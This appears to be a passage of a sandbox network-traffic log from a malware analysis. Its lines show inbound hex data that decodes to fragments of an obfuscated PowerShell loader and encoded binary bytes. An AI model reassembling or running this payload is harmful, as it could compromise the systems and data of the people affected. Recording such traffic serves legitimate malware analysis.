2021-09-14 15:02:53 UTC	344	IN	Data Raw: 45 37 41 35 39 41 46 33 42 42 32 32 35 37 42 36 2d 41 37 35 34 42 43 43 37 43 32 38 44 44 36 41 34 31 36 46 35 39 31 33 43 34 42 44 33 44 37 44 39 41 42 32 36 34 37 34 44 36 31 43 32 43 45 46 46 41 39 46 32 33 39 2d 44 32 42 34 34 44 33 43 36 34 31 32 46 43 44 35 33 33 42 36 31 44 34 46 41 31 31 37 34 46 32 42 36 36 37 46 2d 45 31 32 33 31 32 31 31 38 42 46 33 43 32 41 32 35 43 45 34 31 31 32 2d 33 44 46 2d 42 34 31 37 37 44 2d 41 34 44 33 45 32 44 37 33 36 36 45 32 42 2d 35 44 42 45 35 2d 34 43 39 45 2d 42 44 43 31 37 38 35 2d 34 45 36 43 37 42 45 2d 33 33 38 37 43 42 38 41 31 42 32 36 35 2d 2d 43 41 32 35 43 46 34 32 32 33 2d 38 41 44 46 38 37 33 37 45 44 32 43 31 45 36 2d 35 36 43 34 2d 46 34 2d 32 32 32 38 46 2d 35 37 35 38 41 38 34 32 43 2d 38 2d 38 Data Ascii: E7A59AF3BB2257B6-A754BCC7C28DD6A416F5913C4BD3D7D9AB26474D61C2CEFFA9F239-D2B44D3C6412FCD533B61D4FA1174F2B667F-E12312118BF3C2A25CE4112-3DF-B4177D-A4D3E2D7366E2B-5DBE5-4C9E-BDC1785-4E6C7BE-3387CB8A1B265--CA25CF4223-8ADF8737ED2C1E6-56C4-F4-2228F-5758A842C-8-8
2021-09-14 15:02:53 UTC	351	IN	Data Raw: 41 32 34 32 34 43 32 41 44 31 45 34 35 33 31 43 34 44 31 34 46 36 31 38 35 2d 45 43 34 31 46 2d 43 34 43 38 39 42 37 34 37 34 43 38 36 36 41 37 36 32 45 32 2d 32 2d 46 44 43 35 2d 37 33 38 37 35 37 33 42 38 36 37 37 42 37 32 38 35 39 41 2d 33 44 38 34 36 38 36 35 37 44 36 32 45 37 38 41 33 39 39 33 2d 39 43 32 44 36 45 43 33 41 45 33 45 35 38 46 41 2d 46 35 39 32 43 39 34 2d 41 34 33 45 45 41 45 41 42 33 41 34 31 31 33 33 38 35 45 46 33 43 45 38 35 46 39 2d 36 2d 44 39 46 46 42 44 34 36 42 35 38 43 36 45 33 39 39 2d 2d 43 31 33 41 37 39 39 32 45 45 34 34 42 31 42 42 45 45 43 46 34 34 36 42 33 41 41 32 43 32 43 36 45 35 43 38 39 44 41 43 39 45 45 32 33 44 32 43 41 39 46 32 34 46 35 44 32 34 2d 2d 44 45 32 31 44 44 44 2d 33 38 43 33 32 36 33 32 44 36 2d 34 Data Ascii: A2424C2AD1E4531C4D14F6185-EC41F-C4C89B7474C866A762E2-2-FDC5-7387573B8677B72859A-3D8468657D62E78A3993-9C2D6EC3AE3E58FA-F592C94-A43EEAEAB3A4113385EF3CE85F9-6-D9FFBD46B58C6E399--C13A7992EE44B1BBEECF446B3AA2C2C6E5C89DAC9EE23D2CA9F24F5D24--DE21DDD-38C32632D6-4
2021-09-14 15:02:53 UTC	359	IN	Data Raw: 43 38 31 45 46 32 35 37 36 46 38 45 35 46 38 39 35 41 34 46 39 46 39 35 31 34 2d 32 34 2d 43 38 33 2d 41 34 33 45 31 37 45 31 37 34 43 42 2d 35 39 37 42 44 37 37 45 44 43 31 39 44 38 32 43 45 2d 2d 45 45 41 35 46 38 41 32 42 34 38 34 43 41 42 42 38 38 46 42 45 34 31 44 32 43 2d 34 43 36 39 2d 44 31 42 42 2d 46 38 43 39 31 31 32 31 32 33 43 38 37 45 36 32 31 45 39 35 46 44 42 37 33 44 34 36 34 34 31 32 38 31 39 33 41 32 44 35 41 32 31 35 46 33 38 37 34 34 2d 41 35 38 42 43 38 33 37 37 38 34 45 43 45 45 36 44 46 32 46 31 43 45 2d 34 41 37 33 45 34 32 42 36 43 34 41 41 39 2d 31 42 39 2d 42 35 39 35 32 32 38 2d 36 46 45 46 38 37 46 2d 46 41 45 33 45 38 43 46 38 2d 41 37 43 37 2d 46 36 41 45 37 43 45 41 31 36 35 35 34 42 44 39 42 43 38 38 41 44 36 34 39 34 2d Data Ascii: C81EF2576F8E5F895A4F9F9514-24-C83-A43E17E174CB-597BD77EDC19D82CE--EEA5F8A2B484CABB88FBE41D2C-4C69-D1BB-F8C9112123C87E621E95FDB73D4644128193A2D5A215F38744-A58BC837784ECEE6DF2F1CE-4A73E42B6C4AA9-1B9-B595228-6FEF87F-FAE3E8CF8-A7C7-F6AE7CEA16554BD9BC88AD6494-
2021-09-14 15:02:53 UTC	366	IN	Data Raw: 45 39 45 35 41 41 42 41 2d 34 34 44 31 38 35 37 41 41 43 31 36 37 44 46 42 42 41 36 45 38 34 38 44 32 36 31 31 35 34 43 42 41 37 36 41 42 31 34 45 45 44 45 45 45 43 32 41 39 45 39 33 38 33 31 36 41 35 31 36 37 36 45 39 44 46 32 45 35 43 42 39 33 39 32 43 33 31 45 42 36 31 34 31 32 43 34 33 41 2d 41 33 45 34 46 46 38 43 34 43 37 31 35 39 31 33 46 2d 44 38 45 35 39 44 36 38 2d 38 37 35 32 36 41 44 38 35 43 32 32 37 46 39 45 41 43 45 37 44 33 42 44 36 34 42 37 45 33 42 39 37 2d 36 34 32 46 34 2d 39 46 31 46 37 36 2d 2d 44 46 42 41 38 33 44 41 38 39 42 35 41 32 34 33 42 42 32 31 41 41 33 35 32 43 32 43 36 39 35 42 43 34 45 2d 46 38 32 33 32 45 39 39 32 31 34 38 35 42 36 2d 33 36 31 45 37 35 35 32 44 41 32 43 33 2d 35 34 2d 32 32 39 34 37 43 2d 43 31 31 35 36 Data Ascii: E9E5AABA-44D1857AAC167DFBBA6E848D261154CBA76AB14EEDEEEC2A9E938316A51676E9DF2E5CB9392C31EB61412C43A-A3E4FF8C4C715913F-D8E59D68-87526AD85C227F9EACE7D3BD64B7E3B97-642F4-9F1F76--DFBA83DA89B5A243BB21AA352C2C695BC4E-F8232E9921485B6-361E7552DA2C3-54-22947C-C1156
2021-09-14 15:02:53 UTC	373	IN	Data Raw: 2d 45 45 39 35 41 39 45 35 39 2d 39 36 34 41 44 43 34 42 45 34 32 36 31 31 45 32 42 38 32 39 41 46 37 41 42 33 46 43 34 36 38 33 43 31 37 41 41 36 33 37 41 45 38 44 46 33 34 34 42 41 31 32 43 31 46 39 44 34 43 36 41 35 35 41 39 42 32 38 45 32 31 2d 42 45 43 34 33 36 46 43 43 46 44 38 35 31 32 34 41 33 41 33 35 38 41 41 44 34 37 31 37 45 37 38 33 39 36 34 43 42 36 44 2d 44 42 38 32 41 37 46 36 39 31 42 33 44 32 34 39 2d 36 46 34 42 37 42 37 46 36 39 33 42 41 38 44 35 41 43 45 45 32 32 41 36 32 46 45 42 32 42 32 42 32 32 35 33 44 44 35 36 39 38 35 38 35 33 45 37 37 43 35 36 42 36 35 45 34 32 32 37 44 37 32 38 31 2d 34 36 41 35 34 32 33 46 37 36 38 34 39 43 34 31 35 42 32 31 46 39 39 37 41 36 35 44 35 34 41 31 42 46 44 46 38 46 35 42 45 43 34 33 39 34 41 35 Data Ascii: -EE95A9E59-964ADC4BE42611E2B829AF7AB3FC4683C17AA637AE8DF344BA12C1F9D4C6A55A9B28E21-BEC436FCCFD85124A3A358AAD4717E783964CB6D-DB82A7F691B3D249-6F4B7B7F693BA8D5ACEE22A62FEB2B2B2253DD56985853E77C56B65E4227D7281-46A5423F76849C415B21F997A65D54A1BFDF8F5BEC4394A5
2021-09-14 15:02:53 UTC	380	IN	Data Raw: 44 42 37 42 32 35 33 35 36 39 46 39 43 42 32 42 46 43 35 31 36 38 32 2d 2d 45 44 43 46 33 45 38 43 46 37 45 39 35 36 45 34 32 46 36 44 42 32 32 36 41 31 39 34 33 44 31 41 46 32 36 37 37 2d 39 36 32 38 35 43 37 38 42 42 42 37 44 37 33 36 31 44 31 39 2d 34 2d 46 34 41 37 34 33 32 37 36 44 35 39 41 35 33 2d 34 42 45 42 43 35 33 44 31 39 43 41 42 33 41 35 37 37 43 39 33 45 46 41 44 31 35 35 33 46 31 37 32 2d 38 43 36 41 36 45 33 35 35 45 43 34 31 41 32 44 45 32 42 37 39 43 37 33 42 38 35 38 43 31 44 38 42 33 31 45 33 37 46 46 33 43 34 33 43 35 31 44 31 35 39 37 37 45 42 38 45 45 44 41 34 42 36 39 37 31 43 45 44 37 37 37 45 43 36 2d 36 38 33 2d 31 42 31 33 31 44 45 46 41 32 38 43 37 42 33 43 35 33 34 37 44 45 36 31 39 43 33 35 45 42 44 32 32 2d 38 42 44 45 42 Data Ascii: DB7B253569F9CB2BFC51682--EDCF3E8CF7E956E42F6DB226A1943D1AF2677-96285C78BBB7D7361D19-4-F4A743276D59A53-4BEBC53D19CAB3A577C93EFAD1553F172-8C6A6E355EC41A2DE2B79C73B858C1D8B31E37FF3C43C51D15977EB8EEDA4B6971CED777EC6-683-1B131DEFA28C7B3C5347DE619C35EBD22-8BDEB
2021-09-14 15:02:53 UTC	387	IN	Data Raw: 42 34 41 43 34 34 41 43 37 31 39 37 42 38 32 2d 2d 31 39 37 31 34 43 46 32 41 31 35 35 32 43 38 46 32 33 2d 43 39 43 38 35 31 2d 41 38 46 39 43 33 38 35 33 41 2d 45 44 42 37 31 37 46 43 45 36 42 35 45 2d 42 32 44 38 32 2d 43 35 35 42 41 42 31 36 2d 35 39 31 37 41 35 34 34 43 33 35 46 43 46 34 2d 38 44 38 38 33 45 46 39 32 34 46 36 43 2d 33 36 31 42 41 46 31 35 42 45 31 44 33 31 39 43 34 35 32 33 32 32 31 37 45 37 45 42 43 44 38 34 37 46 32 39 35 43 36 32 32 46 32 44 38 45 45 35 46 37 44 37 39 36 35 32 42 43 45 37 36 45 43 42 33 37 2d 44 45 34 38 42 44 2d 31 43 39 38 36 45 45 39 46 43 43 36 37 31 31 42 36 33 32 32 44 45 46 32 45 42 44 35 37 35 37 46 44 32 39 45 36 45 32 42 39 44 43 33 34 38 32 32 37 2d 44 38 36 39 32 43 44 41 31 32 37 37 35 35 2d 41 39 39 Data Ascii: B4AC44AC7197B82--19714CF2A1552C8F23-C9C851-A8F9C3853A-EDB717FCE6B5E-B2D82-C55BAB16-5917A544C35FCF4-8D883EF924F6C-361BAF15BE1D319C45232217E7EBCD847F295C622F2D8EE5F7D79652BCE76ECB37-DE48BD-1C986EE9FCC6711B6322DEF2EBD5757FD29E6E2B9DC348227-D8692CDA127755-A99
2021-09-14 15:02:53 UTC	395	IN	Data Raw: 46 44 2d 38 2d 37 31 35 41 33 41 31 36 39 43 45 46 2d 36 35 46 41 44 37 41 36 34 45 45 45 42 32 46 32 36 42 2d 33 38 2d 34 31 41 46 46 42 33 38 43 36 44 31 2d 31 31 43 45 31 35 43 2d 44 34 46 34 34 35 39 39 42 2d 43 31 36 38 2d 44 34 33 31 44 43 41 46 35 41 39 39 44 34 33 37 32 43 38 33 42 31 32 42 2d 43 33 33 32 44 34 33 32 42 46 39 37 39 2d 2d 34 41 43 44 39 31 39 34 46 32 39 32 38 44 2d 43 39 37 44 43 42 45 35 42 34 31 32 42 38 43 38 33 38 44 34 33 44 2d 42 35 36 46 35 43 36 2d 36 33 44 41 41 34 41 39 35 45 44 31 43 46 33 43 39 34 33 45 39 43 42 41 36 35 2d 33 39 37 35 44 36 2d 44 39 31 43 37 39 34 35 33 2d 45 31 39 34 46 36 37 39 34 39 41 41 35 34 38 46 46 46 33 34 31 38 2d 44 31 38 31 32 35 31 2d 32 43 37 37 42 44 45 41 41 41 46 42 35 2d 46 45 43 43 Data Ascii: FD-8-715A3A169CEF-65FAD7A64EEEB2F26B-38-41AFFB38C6D1-11CE15C-D4F44599B-C168-D431DCAF5A99D4372C83B12B-C332D432BF979--4ACD9194F2928D-C97DCBE5B412B8C838D43D-B56F5C6-63DAA4A95ED1CF3C943E9CBA65-3975D6-D91C79453-E194F67949AA548FFF3418-D181251-2C77BDEAAAFB5-FECC
2021-09-14 15:02:53 UTC	402	IN	Data Raw: 45 37 45 39 37 32 44 46 46 45 45 35 36 38 39 2d 39 37 41 37 32 33 33 45 36 37 35 45 37 2d 36 42 42 46 44 46 39 43 45 36 41 39 35 43 41 36 34 41 42 38 31 46 33 36 38 45 33 34 37 41 33 37 45 37 43 31 37 33 36 2d 31 35 34 46 42 31 43 33 38 42 31 39 46 38 41 35 39 36 43 2d 34 43 41 42 43 32 44 32 41 33 33 46 37 32 32 31 43 33 43 45 34 31 41 46 34 41 31 33 36 43 2d 45 43 44 35 45 36 41 43 2d 38 43 45 31 37 39 31 32 45 42 45 45 44 42 33 44 31 34 31 43 35 35 32 42 2d 44 34 33 37 33 41 42 35 36 31 42 44 38 32 38 41 45 2d 46 36 33 39 36 38 42 38 45 33 38 2d 44 43 43 41 45 45 41 46 41 33 2d 42 31 43 36 36 41 32 43 46 35 44 42 33 41 32 32 37 37 39 36 43 41 34 41 35 2d 44 43 43 42 2d 36 41 45 46 44 33 43 2d 34 34 39 32 44 41 36 37 33 36 32 45 2d 44 39 45 37 42 32 41 Data Ascii: E7E972DFFEE5689-97A7233E675E7-6BBFDF9CE6A95CA64AB81F368E347A37E7C1736-154FB1C38B19F8A596C-4CABC2D2A33F7221C3CE41AF4A136C-ECD5E6AC-8CE17912EBEEDB3D141C552B-D4373AB561BD828AE-F63968B8E38-DCCAEEAFA3-B1C66A2CF5DB3A227796CA4A5-DCCB-6AEFD3C-4492DA67362E-D9E7B2A
2021-09-14 15:02:53 UTC	409	IN	Data Raw: 42 38 2d 41 43 43 2d 35 33 39 37 45 39 41 32 43 32 37 33 35 43 38 41 42 41 46 41 2d 38 34 38 36 43 39 42 34 45 39 31 34 39 38 31 33 32 36 45 36 39 42 38 42 33 2d 2d 46 34 41 34 38 35 41 46 36 2d 46 45 43 43 44 42 32 45 43 35 36 41 31 34 41 42 39 37 37 42 46 45 32 45 38 37 44 31 38 32 41 33 2d 44 2d 37 43 2d 36 31 32 36 45 32 39 46 44 31 46 36 43 45 44 33 45 39 42 36 32 33 33 31 33 33 34 43 39 32 33 33 31 44 32 35 31 46 44 2d 43 46 43 45 38 33 31 45 45 37 41 37 32 33 41 42 44 44 36 45 2d 32 37 42 46 42 42 32 41 43 31 45 45 37 32 37 33 32 2d 33 33 45 31 2d 45 33 34 37 44 33 38 2d 33 34 34 42 42 38 31 38 37 32 33 44 41 36 46 46 39 44 38 37 41 45 34 46 34 36 43 36 2d 42 43 38 39 39 35 33 39 31 31 36 34 43 38 37 43 36 41 34 34 45 35 35 37 46 44 34 36 43 34 36 Data Ascii: B8-ACC-5397E9A2C2735C8ABAFA-8486C9B4E914981326E69B8B3--F4A485AF6-FECCDB2EC56A14AB977BFE2E87D182A3-D-7C-6126E29FD1F6CED3E9B62331334C92331D251FD-CFCE831EE7A723ABDD6E-27BFBB2AC1EE72732-33E1-E347D38-344BB818723DA6FF9D87AE4F46C6-BC8995391164C87C6A44E557FD46C46
2021-09-14 15:02:54 UTC	416	IN	Data Raw: 2d 36 39 2d 36 65 2d 36 34 2d 36 39 2d 36 65 2d 36 37 2d 32 38 2d 32 39 2d 35 64 2d 30 61 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 35 62 2d 34 66 2d 37 35 2d 37 34 2d 37 30 2d 37 35 2d 37 34 2d 35 34 2d 37 39 2d 37 30 2d 36 35 2d 32 38 2d 35 62 2d 36 32 2d 37 39 2d 37 34 2d 36 35 2d 35 62 2d 35 64 2d 35 64 2d 32 39 2d 35 64 2d 30 61 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 37 30 2d 36 31 2d 37 32 2d 36 31 2d 36 64 2d 32 38 2d 30 61 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 35 62 2d 35 30 2d 36 31 2d 37 32 2d 36 31 2d 36 64 2d 36 35 2d 37 34 2d 36 35 2d 37 32 2d 32 38 2d 34 64 2d 36 31 2d 36 65 2d 36 34 2d 36 31 2d 37 34 2d 36 66 2d 37 32 2d 37 39 2d 33 64 2d 32 34 2d 37 34 2d 37 32 2d 37 35 2d 36 35 2d 32 39 2d 35 64 2d 32 30 Data Ascii: -69-6e-64-69-6e-67-28-29-5d-0a-20-20-20-20-5b-4f-75-74-70-75-74-54-79-70-65-28-5b-62-79-74-65-5b-5d-5d-29-5d-0a-20-20-20-20-70-61-72-61-6d-28-0a-20-20-20-20-20-20-20-20-5b-50-61-72-61-6d-65-74-65-72-28-4d-61-6e-64-61-74-6f-72-79-3d-24-74-72-75-65-29-5d-20
2021-09-14 15:02:54 UTC	424	IN	Data Raw: 33 31 2d 33 30 2d 33 36 2d 33 31 2d 34 36 2d 33 32 2d 33 39 2d 33 39 2d 33 34 2d 33 31 2d 33 33 2d 33 30 2d 33 37 2d 33 31 2d 33 36 2d 33 31 2d 33 33 2d 33 30 2d 33 38 2d 33 37 2d 34 35 2d 33 30 2d 33 38 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 34 2d 33 30 2d 33 39 2d 33 37 2d 34 32 2d 33 30 2d 34 32 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 34 2d 33 31 2d 33 31 2d 33 30 2d 33 37 2d 33 31 2d 34 31 2d 34 34 2d 33 36 2d 33 31 2d 34 31 2d 34 34 2d 33 36 2d 33 31 2d 33 32 2d 33 30 2d 33 38 2d 33 31 2d 34 31 2d 33 31 2d 33 32 2d 33 30 2d 33 30 2d 33 36 2d 34 36 2d 33 32 2d 33 34 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 36 2d 33 31 2d 33 36 2d 34 36 2d 34 35 2d 33 30 2d 33 31 2d 33 31 2d 33 33 2d 33 31 2d 33 35 2d 33 31 2d 33 31 2d Data Ascii: 31-30-36-31-46-32-39-39-34-31-33-30-37-31-36-31-33-30-38-37-45-30-38-30-30-30-30-30-34-30-39-37-42-30-42-30-30-30-30-30-34-31-31-30-37-31-41-44-36-31-41-44-36-31-32-30-38-31-41-31-32-30-30-36-46-32-34-30-30-30-30-30-36-31-36-46-45-30-31-31-33-31-35-31-31-
2021-09-14 15:02:54 UTC	431	IN	Data Raw: 30 2d 33 30 2d 33 30 2d 33 30 2d 33 37 2d 33 30 2d 33 32 2d 33 30 2d 33 37 2d 33 37 2d 34 35 2d 34 35 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 38 2d 33 34 2d 34 34 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 36 2d 33 32 2d 33 30 2d 33 36 2d 34 35 2d 34 35 2d 33 38 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 38 2d 33 34 2d 33 33 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 36 2d 33 32 2d 33 30 2d 33 31 2d 33 36 2d 34 36 2d 33 33 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 38 2d 33 33 2d 33 39 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 36 2d 33 32 2d 33 30 2d 33 36 2d 34 31 2d 34 35 2d 33 31 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 38 2d 33 32 2d 34 36 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 Data Ascii: 0-30-30-30-37-30-32-30-37-37-45-45-30-30-30-30-32-38-34-44-30-30-30-30-30-36-32-30-36-45-45-38-30-30-30-30-32-38-34-33-30-30-30-30-30-36-32-30-31-36-46-33-30-30-30-30-32-38-33-39-30-30-30-30-30-36-32-30-36-41-45-31-30-30-30-30-32-38-32-46-30-30-30-30-30-3
2021-09-14 15:02:54 UTC	438	IN	Data Raw: 2d 33 31 2d 34 33 2d 33 36 2d 33 33 2d 33 36 2d 33 36 2d 33 31 2d 34 33 2d 33 36 2d 33 33 2d 33 32 2d 34 32 2d 33 34 2d 33 39 2d 33 32 2d 33 38 2d 33 31 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 34 31 2d 33 30 2d 33 36 2d 33 32 2d 33 38 2d 33 31 2d 33 37 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 34 31 2d 33 32 2d 34 32 2d 33 36 2d 33 31 2d 33 31 2d 33 32 2d 33 30 2d 33 32 2d 33 32 2d 33 38 2d 33 31 2d 33 38 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 34 31 2d 33 32 2d 33 33 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 33 2d 33 36 2d 33 30 2d 33 32 2d 33 32 2d 34 32 2d 33 30 2d 34 33 2d 33 32 2d 34 32 2d 33 34 2d 33 35 2d 33 33 Data Ascii: -31-43-36-33-36-36-31-43-36-33-32-42-34-39-32-38-31-30-30-30-30-30-30-41-30-36-32-38-31-37-30-30-30-30-30-41-32-42-36-31-31-32-30-32-32-38-31-38-30-30-30-30-30-41-32-33-30-30-30-30-30-30-30-30-30-30-30-30-30-30-30-30-33-36-30-32-32-42-30-43-32-42-34-35-33
2021-09-14 15:02:54 UTC	445	IN	Data Raw: 33 38 2d 33 36 2d 33 35 2d 33 32 2d 33 30 2d 34 32 2d 34 33 2d 34 36 2d 33 38 2d 33 37 2d 33 32 2d 33 30 2d 33 33 2d 33 32 2d 33 30 2d 34 32 2d 33 36 2d 34 36 2d 33 38 2d 33 37 2d 33 32 2d 33 30 2d 33 33 2d 33 35 2d 33 39 2d 33 32 2d 33 30 2d 33 33 2d 33 32 2d 33 33 2d 33 39 2d 33 34 2d 34 31 2d 33 31 2d 33 33 2d 33 36 2d 33 36 2d 33 32 2d 33 30 2d 33 37 2d 33 37 2d 33 37 2d 33 36 2d 34 32 2d 33 35 2d 33 32 2d 33 35 2d 33 35 2d 33 38 2d 33 32 2d 33 30 2d 33 36 2d 34 31 2d 33 33 2d 34 34 2d 33 36 2d 34 32 2d 33 31 2d 33 32 2d 33 35 2d 33 39 2d 33 36 2d 33 36 2d 33 32 2d 33 30 2d 34 35 2d 33 32 2d 34 34 2d 33 32 2d 34 32 2d 33 36 2d 33 31 2d 33 36 2d 33 32 2d 33 30 2d 33 31 2d 34 35 2d 33 31 2d 34 34 2d 33 34 2d 33 39 2d 34 35 2d 33 39 2d 33 35 2d 33 38 2d Data Ascii: 38-36-35-32-30-42-43-46-38-37-32-30-33-32-30-42-36-46-38-37-32-30-33-35-39-32-30-33-32-33-39-34-41-31-33-36-36-32-30-37-37-37-36-42-35-32-35-35-38-32-30-36-41-33-44-36-42-31-32-35-39-36-36-32-30-45-32-44-32-42-36-31-36-32-30-31-45-31-44-34-39-45-39-35-38-
2021-09-14 15:02:54 UTC	453	IN	Data Raw: 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 34 31 2d 33 33 2d 33 38 2d 34 31 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 32 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33 37 2d 33 39 2d 33 32 2d 34 33 2d 34 36 2d 34 36 2d 33 32 2d 33 37 2d 33 36 2d 33 36 2d 33 32 2d 33 30 2d 33 32 2d 33 35 2d 33 36 2d 33 31 2d 34 31 2d 33 38 2d 33 30 2d 33 31 2d 33 35 2d 33 39 2d 33 32 2d 33 30 2d 33 32 2d 33 36 2d 34 35 2d 33 38 2d 34 36 2d 34 36 2d 33 32 2d 33 32 2d 33 35 2d 33 38 2d 33 36 2d 33 36 2d 33 32 2d 33 30 2d 33 37 2d 33 30 2d 34 31 2d 33 35 2d 34 31 2d 33 37 2d 33 30 2d 33 36 2d 33 35 2d 33 39 2d 33 32 2d 33 38 2d 33 31 2d 34 36 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 34 31 2d 33 32 2d 34 32 2d 33 33 2d 33 39 2d 33 31 2d 33 Data Ascii: 0-30-30-30-30-41-33-38-41-30-30-30-30-30-30-30-31-32-30-30-32-30-37-39-32-43-46-46-32-37-36-36-32-30-32-35-36-31-41-38-30-31-35-39-32-30-32-36-45-38-46-46-32-32-35-38-36-36-32-30-37-30-41-35-41-37-30-36-35-39-32-38-31-46-30-30-30-30-30-41-32-42-33-39-31-3
2021-09-14 15:02:54 UTC	460	IN	Data Raw: 2d 34 36 2d 34 35 2d 33 30 2d 33 39 2d 33 30 2d 33 32 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 34 36 2d 33 36 2d 33 31 2d 33 32 2d 34 35 2d 34 36 2d 34 32 2d 34 34 2d 33 36 2d 33 36 2d 33 32 2d 33 30 2d 33 32 2d 34 35 2d 33 35 2d 33 37 2d 34 35 2d 33 30 2d 34 36 2d 33 38 2d 33 35 2d 33 38 2d 33 32 2d 33 30 2d 34 32 2d 34 36 2d 33 30 2d 33 32 2d 33 30 2d 34 34 2d 34 34 2d 34 34 2d 33 36 2d 33 31 2d 33 36 2d 33 36 2d 33 36 2d 33 35 2d 33 32 2d 33 30 2d 34 32 2d 33 31 2d 34 34 2d 34 33 2d 34 34 2d 33 32 2d 33 31 2d 33 38 2d 33 36 2d 33 31 2d 33 36 2d 33 35 2d 33 32 2d 33 30 2d 33 34 2d 33 37 2d 33 39 2d 34 31 2d 33 32 2d 34 35 2d 34 36 2d 34 36 2d 33 35 2d 33 38 2d 33 35 2d 34 36 2d 33 39 2d 33 31 2d 34 36 2d 34 35 2d 33 30 2d 33 39 2d 33 30 2d 33 32 2d 33 30 Data Ascii: -46-45-30-39-30-32-30-30-32-30-46-36-31-32-45-46-42-44-36-36-32-30-32-45-35-37-45-30-46-38-35-38-32-30-42-46-30-32-30-44-44-44-36-31-36-36-36-35-32-30-42-31-44-43-44-32-31-38-36-31-36-35-32-30-34-37-39-41-32-45-46-46-35-38-35-46-39-31-46-45-30-39-30-32-30
2021-09-14 15:02:54 UTC	467	IN	Data Raw: 33 34 2d 33 30 2d 33 30 2d 34 34 2d 33 37 2d 33 30 2d 33 32 2d 33 33 2d 33 36 2d 33 30 2d 33 30 2d 34 32 2d 34 35 2d 33 30 2d 33 32 2d 34 34 2d 34 32 2d 33 30 2d 33 32 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 34 33 2d 33 35 2d 33 30 2d 33 32 2d 34 36 2d 33 32 2d 33 30 2d 33 31 2d 33 33 2d 33 31 2d 33 30 2d 33 30 2d 34 32 2d 33 35 2d 33 30 2d 33 30 2d 34 35 2d 34 33 2d 33 30 2d 33 32 2d 33 33 2d 33 36 2d 33 30 2d 33 30 2d 34 32 2d 34 35 2d 33 30 2d 33 30 2d 34 36 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 34 33 2d 33 30 2d 33 30 2d 33 30 2d 34 36 2d 33 32 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 38 2d 33 30 2d 33 30 2d 33 30 2d 33 39 2d 33 31 2d 33 32 2d 33 30 2d 34 32 2d 33 35 2d Data Ascii: 34-30-30-44-37-30-32-33-36-30-30-42-45-30-32-44-42-30-32-30-31-30-30-43-35-30-32-46-32-30-31-33-31-30-30-42-35-30-30-45-43-30-32-33-36-30-30-42-45-30-30-46-30-30-32-30-31-30-30-43-30-30-30-46-32-30-31-30-30-30-30-30-30-30-30-38-30-30-30-39-31-32-30-42-35-
2021-09-14 15:02:54 UTC	474	IN	Data Raw: 30 2d 33 32 2d 34 31 2d 34 32 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 34 32 2d 33 35 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 34 32 2d 33 35 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33 30 2d 34 32 2d 34 35 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 34 32 2d 33 35 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33 30 2d 34 32 2d 34 35 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 33 38 2d 34 33 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33 Data Ascii: 0-32-41-42-30-30-30-30-32-30-30-31-30-30-42-35-30-30-30-30-30-30-30-31-30-30-42-35-30-30-30-30-32-30-30-32-30-30-42-45-30-30-30-30-30-30-30-31-30-30-42-35-30-30-30-30-30-30-30-32-30-30-42-45-30-30-30-30-30-30-30-31-30-30-38-43-30-30-30-30-30-30-30-32-30-3
